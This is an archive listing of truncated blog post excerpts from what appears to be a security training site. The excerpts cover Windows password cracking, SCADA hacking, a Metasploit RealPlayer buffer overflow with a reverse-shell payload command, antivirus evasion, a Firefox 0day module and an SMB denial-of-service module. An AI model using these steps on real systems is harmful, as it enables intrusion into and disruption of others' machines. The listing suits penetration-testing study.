Category Archives: Exploit

Exploit (computer security)


ByteCode is a leading company in delivering the IT Training and Certifications. Since its foundation we are committed to offer the best Trainings and Services to our students, clients and partners with a high standard, Because we believe that high standards Read more…


  Bytecode Cyber Security is Now Authorized Training Partner of  DIS Consultant,India   Online and Classroom Trainings Bytecode cyber security is India’s Best institute to learn DIS10( Diploma in information Security). DIS10 is one certification program which has benefits of Read more…


Window Password Cracking —————————————————————————————————————————————–     It is quiet hurting that u lost your windows password of forgot ur password     Ur friend PC is placed in front of U but it is password protected     Really Hurting Read more…


Cyber Stalking can be defined as the repeated acts harassment or threatening behavior of the cyber criminal towards the victim by using internet services. Stalking in General terms can be referred to as the repeated acts of harassment targeting the Read more…


HOW TO HACK SCADA SYSTEMS? SCADA stands for Supervisory Control And Data Acquisition. These are the systems which are spread over a wide area, used in controlling and managing industrial environments, to know more about SCADA read our post An Read more…


Hack Remote Windows PC using Real player RealMedia File Handling stack based buffer overflow on RealPlayer This module exploits a stack based buffer overflow on RealPlayer set payload windows/meterpreter/reverse_tcp msf exploit (real_player_url_property_bof)>set lhost 192.168.1.3 (IP of Local Host) msf exploit Read more…


Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search ;domain name. With help of this script we can extract email address which are on the specified Read more…


Backtrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerability in web-application. Previously i post about what is directory traversal & how to bypass its filter , but that process is manual, it can Read more…


Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder Read more…


Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it. Exploit target: Id Name — —- 0 Read more…


In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and Read more…


This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the Read more…


If you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol. How to configure ssh in Backtrack 5 r3? (1)First we Read more…


Hey here is new tools which I found is WEBSPLOIT. First download WEBSPLOIT from here.Now install it. (it`s old article; view updated part at bottom to download latest version) Installation process are as follow. (1)First download WebSploit toolkit (2)Now unzip Read more…